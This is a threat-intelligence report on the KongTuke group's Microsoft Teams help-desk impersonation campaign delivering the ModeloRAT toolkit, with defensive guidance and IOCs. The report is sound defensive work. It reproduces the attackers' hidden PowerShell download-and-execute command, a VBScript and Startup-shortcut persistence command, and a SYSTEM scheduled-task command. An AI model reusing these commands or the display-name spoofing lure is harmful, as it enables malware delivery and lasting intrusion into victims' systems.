Editor’s note: This report was authored by Thassanai McCabe and Debarshi Ghosh.

Key Points

  • Financially motivated initial access broker (IAB) “KongTuke” has moved to external Microsoft Teams chats for initial access—the first time we’ve seen the group use a collaboration platform instead of its earlier web-only “ClickFix” delivery.

  • The “ModeloRAT” toolkit that’s ultimately deployed is built to survive disruption, with three independent command-and-control (C2) paths on separate infrastructure as well as persistence spread across four triggers. This means cutting one channel or artifact still leaves access in place.

  • Active since at least April 2026, the chain reaches persistent access within five minutes of a user pasting a single PowerShell command.

  • To counter KongTuke, restrict external Teams federation to a trusted organization allowlist and hunt for portable Python under %APPDATA%\Roaming\WPy64-*.

Threat actors are impersonating help-desk staff over external Microsoft Teams chats to trick victims into deploying "ModeloRAT" on their own machines. ReliaQuest attributes the activity to financially motivated initial access broker (IAB) "KongTuke" based on reuse of the group's custom Python loader. Previously, KongTuke has compromised WordPress sites to host "ClickFix" and "CrashFix" lures and paste-and-run prompts on fake CAPTCHA or browser-crash pages for access that has historically fed ransomware affiliates. This Teams activity, which appears to add to, rather than replace, that web-based approach, marks the first time we’ve seen KongTuke use a collaboration platform for initial access. In the incidents we investigated, a single external Teams chat moved the operator from cold outreach to a persistent foothold in under five minutes.

Since April 2026, KongTuke has used the same support-themed pretext popularized by ransomware group "Black Basta," which is now defunct but whose technique is still widely copied. Help-desk impersonation is likely becoming the collaboration-platform counterpart of traditional email-based phishing. The tactic is widespread because it’s effective, and as it continues to see success, more actors will likely adopt it. Where Black Basta leaned on a fast ransomware executable, KongTuke is deploying an updated ModeloRAT toolkit with redundant command and control (C2), server failover, and layered persistence, which is closer to the durable-foothold pattern seen in our recent PySoxy reporting than to a smash-and-grab.

Across 45 days, the operator rotated through five Microsoft 365 tenants to blunt reactive blocking, and persistence was spread across four separate triggers. This means that cutting one channel or artifact still leaves access elsewhere.

Read on to learn:

  • How a single Teams chat reached persistent access in under five minutes

  • Why blocking one C2 channel, or one URL pattern, left the attacker still inside

  • The fourth persistence mechanism standard remediation almost always misses

Why External Chat Works as an Initial-Access Channel

KongTuke’s shift to Teams matters more than the malware itself. Plenty of threat actors abuse Teams, but most are opportunistic; KongTuke has deliberately moved a working web-based operation onto the platform, which likely signals where this tradecraft is headed. For defenders, it means a control gap many organizations have not yet closed: External chat is now an initial-access channel on par with email but is rarely governed like one. There are three reasons KongTuke likely made the move.

  • Lower friction than email: Email delivery is becoming more difficult for attackers as secure email gateways, domain-authentication enforcement, and impersonation-detection controls continue to raise the bar. ClickFix, the group’s earlier lure, sidestepped some of those defenses by moving the social-engineering step into the browser through paste-and-run prompts on fake CAPTCHA or browser-crash pages. But it still relied on driving users to a malicious page via search results, malvertising, or email links, which are all channels defenders monitor closely.

  • Trust by interface: A direct chat from an external tenant appears in the same interface employees use every day, and it feels internal, conversational, and low risk. Years of phishing training have conditioned employees to scrutinize email; few apply the same scrutiny to a chat. In many Microsoft 365 environments, external chat is broadly allowed unless explicitly restricted, giving attackers a direct line to users with minimal overhead.

  • Disposable infrastructure: Registering a Microsoft 365 tenant is fast and cheap, and in this campaign the operator rotated through five tenants in 45 days. By the time one sender domain reaches a block list, the actor is usually already on the next. The most reliable control is tighter governance over which outside organizations can message users in the first place.

Taken together, these three factors give KongTuke a delivery channel that’s easier to reach, more trusted on arrival, and cheaper to replace than anything in its earlier web-only approach. That matters because, once a user engages, what lands on the host is a toolkit built for survivability.

Inside the Evolved ModeloRAT

ModeloRAT and WinPython are known hallmarks of KongTuke, observed across the group's ClickFix and CrashFix campaigns. The version we observed in this campaign evolves that toolchain in three concrete ways: The C2 layer now uses a five-server pool with sequential failover, two additional Python remote-access trojan (RAT) modules run on separate infrastructure, and persistence is layered across four triggers rather than a single Run key. The result is a toolkit built to outlast partial response.

Multiple Access Paths Complicate Containment

Disrupting one ModeloRAT component does not contain the compromise. The toolkit runs three independent access paths on separate infrastructure, each capable of continuing to function when defenders disrupt the others. Each one builds on the last, starting with the runtime that makes the rest possible.

The Carrier: Portable WinPython

The malicious activity executes under a trusted, signed binary that signature-based detection alone is unlikely to flag. The carrier is WPy64-31401, an unmodified portable WinPython release. By bundling Python with the payload, the attacker removes any dependency on the target environment having Python installed, while the signed pythonw.exe binary helps mask the activity that follows. Once the runtime is in place, the first module executes with a clear purpose: rapidly profile the host before the operator types a single command.

Reconnaissance: Pre-Staged Host Context

By the time the operator types their first command, they already know enough about the host to prioritize follow-on activity. The first module to run is the reconnaissance collector, observed under names including collector.py, games.py, and fileviewer.py. The reconnaissance collector launches hidden PowerShell to gather host and user information (including systeminfo, whoami /all, domain and group details, and Lightweight Directory Access Protocol [LDAP] enumeration using adsisearcher). The collector then writes the results to configA.json. That context is then handed off to the implant that runs the operation.

Primary Implant: Pmanager.py

The primary implant is built to outpace indicator-based defenses. Rotating servers, randomized URLs, and on-demand self-updates mean any IP address, domain, or hash captured in one incident can become outdated before defenders can apply it broadly. Pmanager.py beacons over RC4- and zlib-protected HTTP. It rotates through five hardcoded C2 servers and fails over automatically when one is blocked. Each beacon also uses randomized URL paths, making signatures tied to any single path or server unreliable. Pmanager.py also accepts a self-update command, allowing the attacker to push a new build to compromised targets mid-campaign.

A confirmed compromise should be treated as a potential data-loss event regardless of the user's role. Beyond reconnaissance and shell access, the toolkit can capture screenshots and exfiltrate arbitrary files on operator command. Files are sent in single uncompressed POSTs with no size limit—a 500MB database could leave the host in a single HTTP request. Even with the primary implant disrupted, the operator doesn’t lose access; two additional modules are designed to take over.

Fallback Access: Two Independent Backdoors

Blocking one channel is not containment. Beyond the primary implant, KongTuke deploys two fallback access modules, each running on separate attacker infrastructure. The result is three independent access paths into a compromised host: a primary RAT, a secondary reverse shell, and a raw TCP backdoor. Each path runs on separate infrastructure and can stay live when the others are cut. Standard incident response, which often stops after disrupting the most visible channel, can leave the operator inside.

Persistence That Outlasts Standard Cleanup

Across incidents, we observed the same persistence chain on every infected host: Three artifacts working together to ensure execution at logon, with a fourth mechanism appearing on hosts that received post-exploitation tasking.

The Baseline Three Artifacts

On every infected host, three persistence artifacts were present:

  • A registry Run key under HKCU\Software\Microsoft\Windows\CurrentVersion\Run, often named MonitoringService to blend in with legitimate enterprise tools.

  • A Startup folder shortcut named StartManagerB.lnk, which pointed to the VBScript wrapper below.

  • A VBScript launcher (scriptA.vbs) in %APPDATA%\WPy64-31401\python, which in turn launched pythonw.exe and the main RAT module.

The Run key and the Startup shortcut are two independent triggers, but both ultimately route through the same VBScript launcher, which is what gives the chain its layered character at the trigger level while keeping a single execution path.

The Fourth Mechanism: SYSTEM-Level Scheduled Task

On hosts that received post-exploitation tasking, we observed a fourth mechanism: A SYSTEM-level scheduled task registered to run daily at midnight, with a name chosen to mimic legitimate folders such as ChromeA or AdobeA. The command observed creating that task is shown below:

schtasks /create /tn "ChromeA" /tr "C:\Users\<user>\AppData\Roaming\WPy64-31401\python\pythonw.exe C:\Users\<user>\AppData\Roaming\WPy64-31401\python\Pmanager.py" /sc daily /st 00:00 /ru SYSTEM /rl HIGHEST /f /run

The /run flag makes this especially risky in the near term: The task executes as soon as it is created, while the daily midnight trigger remains in place as a backup. In our review of the ModeloRAT modules, we found that the implant's self-destruct routine removes only the Run key, Startup shortcut, and VBScript launcher. It doesn’t check for or delete the scheduled task. That means the task can persist through a reboot and remain active even after the operator has stepped away.

Before returning any affected host to production, security teams should explicitly enumerate:

  • Run keys

  • Startup folder shortcuts

  • %APPDATA%\WPy64-* directories

  • VBScript launchers tied to user-writable Python paths

  • Scheduled tasks running as SYSTEM with names that mimic legitimate AppData or ProgramData folders

This step is often missing from standard remediation checklists and needs to be added deliberately, because every artifact left behind is a re-entry point. For defenders, containment must address both the delivery path and every persistence artifact the chain leaves behind.

From Help-Desk Chat to Foothold: How KongTuke Gains Access

Here's how the chain unfolds, from the initial Teams message through to execution on the endpoint.

The IT Support and Help-Desk Lure

In each incident we investigated, the threat actor initiated a one-on-one Teams chat from an external Microsoft 365 tenant and impersonated internal IT or help-desk staff. To the user, the chat preview looked like a legitimate internal message: A sender called "Help Desk" or "IT Support" sitting alongside their other internal contacts. Underneath, the attacker achieved that effect by appending Unicode whitespace characters to the display name, padding it so the rendered chat preview matched what an internal contact would look like. This is effectively display-name spoofing at the platform level: The rendered name is what the user sees, not the underlying tenant or domain.

The most recently observed sender address was itsupport[at]deepminds[.]me, with a display name visually indistinguishable from a legitimate internal support contact. We observed this address across multiple customer environments, ruling out a targeted single-victim operation. All chat sessions in our telemetry originated from a single Tor proxy node, which likely points to a common operator behind the rotating tenant infrastructure described earlier.

Once the actor has established trust with the user over chat, the next step is to guide them into running the payload.

From Scripted Chat to PowerShell Execution

Once the chat is established, the attacker walks the user through a scripted social engineering sequence. The pretext varies—account lockout, mailbox issue, or certificate error—but the user is always directed to download and run a "diagnostic tool." In the incidents we investigated, that tool was a ZIP archive hosted on a legitimate cloud file-sharing service. The archive contained a portable WinPython runtime and the ModeloRAT scripts. The user was then instructed to paste a single PowerShell command into Windows Run, which downloaded the archive, extracted it into AppData, deleted the ZIP, and launched the first Python module.

The initial execution command observed across incidents is shown below:

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command "iwr -Uri 'hxxps://www.dropbox[.]com/scl/fi/<id>/<archive>.zip?dl=1' -OutFile $env:appdata\Winp.zip; Expand-Archive -Path $env:appdata\Winp.zip -DestinationPath $env:appdata; rm $env:appdata\Winp.zip; Start-Sleep -Seconds 5; cd $env:appdata\WPy64-31401\python; .\pythonw.exe .\games.py"

This command does everything needed to move from user action to execution without further interaction. It runs hidden, bypasses PowerShell execution restrictions, stages a full Python environment in a user-writable directory, and starts execution with pythonw.exe, which avoids opening a visible console window.

Persistence and the Five-Minute Clock

From that point, the rest of the chain unfolds quickly. WinPython landed in %APPDATA%\Roaming\WPy64-31401\ within 90 seconds. Within two minutes, pythonw.exe had launched the reconnaissance collector and begun spawning hidden PowerShell processes to enumerate the host. Shortly after, a second hidden PowerShell instance created persistence, and by the five-minute mark the host had begun beaconing outbound to attacker infrastructure.

The chain can survive reboots the moment persistence fires, which happens immediately after initial execution. The attacker writes a VBScript launcher to disk and creates a shortcut in the user's Startup folder, so ModeloRAT, the toolkit detailed earlier, starts again at logon. The command observed creating that persistence is shown below:

powershell -NonInteractive -NoProfile -WindowStyle Hidden -Command "vbsContent = @'Set WshShell = CreateObject(""[WScript.shell](http://WScript.shell)"")command = ""powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command """"Start-Sleep -Seconds 6; cd env:appdata\WPy64-31401\python; .\pythonw.exe .[Pmanager.py](http://Pmanager.py)""""""WshShell.run command, 0, FalseSet WshShell = Nothing'@;vbsPath = ""env:APPDATA\WPy64-31401\python\scriptA.vbs"";vbsContent | Out-File -FilePath vbsPath -Encoding ASCII;WshShell = New-Object -comObject [WScript.shell](http://WScript.shell);Shortcut = WshShell.CreateShortcut(""env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\StartManagerB.lnk"");Shortcut.TargetPath = vbsPath;$Shortcut.save()"

The chain writes a VBScript wrapper (scriptA.vbs) and a Startup folder shortcut (StartManagerB.lnk) that relaunch Pmanager.py through the bundled Python runtime each time the user logs on. The added six-second delay before Python execution can help the chain survive shallow sandboxing and break simple detections that rely on correlating the persistence event with the follow-on RAT launch.

In practice, that leaves very little time for manual response. By the time a Teams message is reported and reviewed, the host may already be beaconing and persistent. The defensive window is short, and the human signal that something is wrong is much weaker. That short response window matters even more because the toolkit itself is built to preserve access after the initial foothold is established.

Step Up Your Defenses Against KongTuke

ReliaQuest’s Approach

KongTuke moves from a single Teams message to persistent, modular access in under five minutes. ReliaQuest GreyMatter equips security teams to detect those behaviors as a sequence and contain them before the toolkit’s redundancy turns a single host into a recurring foothold.

GreyMatter Transit provides visibility against the behaviors observed in this campaign, where domain- and sender-based blocking falls short. Because the operator rotates Microsoft 365 tenants faster than reactive blocks can keep up, traditional indicators go stale quickly. GreyMatter Transit monitors network telemetry while it’s still in motion, surfacing the exact KongTuke patterns covered in this report.

GreyMatter Agentic AI focuses on behavior across the kill chain rather than individual signals. In this campaign, an external Teams chat from an unfamiliar tenant, a hidden PowerShell session launching from Windows Run, a portable Python runtime appearing under %APPDATA%\Roaming\WPy64-*, and a Startup folder shortcut written by pythonw.exe are low-confidence events in isolation. Correlated, they describe an active compromise. Correlated at machine speed, they describe an active compromise well within KongTuke's five-minute window from first contact to persistence.

ReliaQuest Detection Rules are continuously updated using the latest threat intelligence and research.

KongTuke’s five-minute path from chat to persistence leaves almost no room for manual response, and the toolkit’s three C2 paths and four persistence triggers mean partial containment still leaves access in place. The following GreyMatter Automated Response Playbooks act on our detection rules to close that window automatically, cutting the operator off across every access path before the chain can re-execute:

  • Isolate Endpoint: Immediately removes the affected host from the network, cutting off C2 communication across all three independent access paths described in this report and preventing the operator from issuing new commands before remediation completes.

  • Terminate Sessions: Invalidates active sessions on hosts where the toolkit may have already captured screenshots, exfiltrated files, or harvested credential material on operator command, shutting down the lateral and identity-based access avenues that follow the initial foothold.

  • Ban Hash: Prevents reinfection from malicious files KongTuke uses, including games.py, StartManagerB.lnk, and scriptA.vbs.

Your Action Plan

KongTuke moved from a single Teams chat to persistent, modular access in one user session, so defenses need to account for trusted-channel social engineering, multi-path C2, and persistence that survives standard cleanup. These recommendations target the gaps conventional controls often leave exposed:

  • Restrict External Teams Federation Now: External Teams chat is the entry point that makes this campaign work, and tenant rotation makes sender- and domain-based blocking unreliable as a sole control. Move external Teams federation to a trusted-organization allowlist so unknown tenants cannot place a chat in front of users in the first place.

  • Hunt for Portable Python in User AppData: A WinPython installation under %APPDATA%\Roaming\WPy64-* is not standard for managed enterprise software and maps directly to ModeloRAT activity in this campaign. Treat it as a high-signal indicator and hunt for it across managed endpoints, not only on hosts already flagged for response.

  • Audit All Four Persistence Triggers Before Returning a Host to Production: ModeloRAT spreads persistence across the Run key, the Startup folder shortcut, and the VBScript launcher in %APPDATA%\WPy64-31401\python\. On hosts where the attacker took “hands-on-keyboard” action, such as exfiltrating files or running follow-up commands, a fourth mechanism is added: a SYSTEM-level scheduled task with an AppData- or ProgramData-style name. Treat any host with confirmed operator activity as having all four, enumerate each one, and remove every survivor, because a single remaining trigger is enough for the chain to re-execute at next logon.

Those defensive steps address the current campaign, but the broader lesson is that KongTuke’s shift to Teams is likely part of a wider change in how this activity will develop.

Key Takeaways and What's Next

KongTuke has likely crossed from passive web targeting into active person-to-person social engineering, adopted a Black Basta-style help-desk playbook, and rolled out a toolkit whose three C2 paths and four persistence triggers leave it well positioned to survive partial response. Coverage needs to be behavior-based and built for the shift in trust this campaign represents.

Compromised trusted tenants will likely replace disposable tenants in some operations. In this campaign, KongTuke rotated across five Microsoft 365 tenants in 45 days. If more organizations move to federation allowlists, the next logical adaptation is to send the same lure from a compromised supplier, partner, or managed service provider tenant already trusted by the target.

The help-desk pretext is highly likely to spread to other enterprise chat platforms. The advantage in this campaign was not unique to Teams itself; it was the use of a chat channel employees are less trained to question than email. If defenders tighten Teams federation, the same approach could move to Slack, Zoom Team Chat, or Webex environments that still permit broad external messaging.

Persistence is likely to become more cleanup-resistant, not less. The current ModeloRAT chain already spreads persistence across multiple artifacts and, in some cases, a scheduled task that standard remediation may miss. That emphasis on survivability suggests future changes are at least as likely to focus on staying power after execution as on new delivery mechanisms.

Three Takeaways to Act On

  • Govern external collaboration channels with the same rigor as email. Monitoring alone will not catch this pretext.

  • Treat single-channel containment as incomplete by default. Three C2 paths and four persistence triggers mean blocking one tells you nothing about remaining access.

  • Build detection around behavior, not indicators. Tenants, IPs, and URL paths rotate faster than reactive blocking can keep up.

IOCs

Artifact

Details

6d11817f510e596bb9b739dd1fddb 3b1c929831b81503a4e8d7129543bf899b9

games.py (reconnaissance collector variant)

c404f6c2efbf4ff76aef245c2b0a 4d2604be4dcdc1a7711823ed5ed5c1c736df

StartManagerB.lnk

61338b21f568c843773c02dac4d 1b773b78fdcf65ba1e65bab44a8a278875fb9

scriptA.vbs

144.172.99[.]68

Pmanager.py C2 server

45.61.136[.]94

Pmanager.py C2 server

64.95.12[.]238

Pmanager.py C2 server

162.33.179[.]149

Pmanager.py C2 server

64.95.13[.]76

Pmanager.py C2 server

64.95.10[.]14

Pmanager.py C2 server

hxxps://www[.]dropbox[.]com/scl/fi/ 88btyiyisjwbuxhappb8m/ltuipoaensloieo[.]zip

Dropbox-hosted ZIP delivering ModeloRAT

hxxps://www[.]dropbox[.]com/scl/fi/ vpyhgodqd358qtp0fmnzr/at3[.]zip

Dropbox-hosted ZIP (variant)

HelpDesk[at]officeupdates366.onmicrosoft[.]com

Sender address used in help-desk impersonation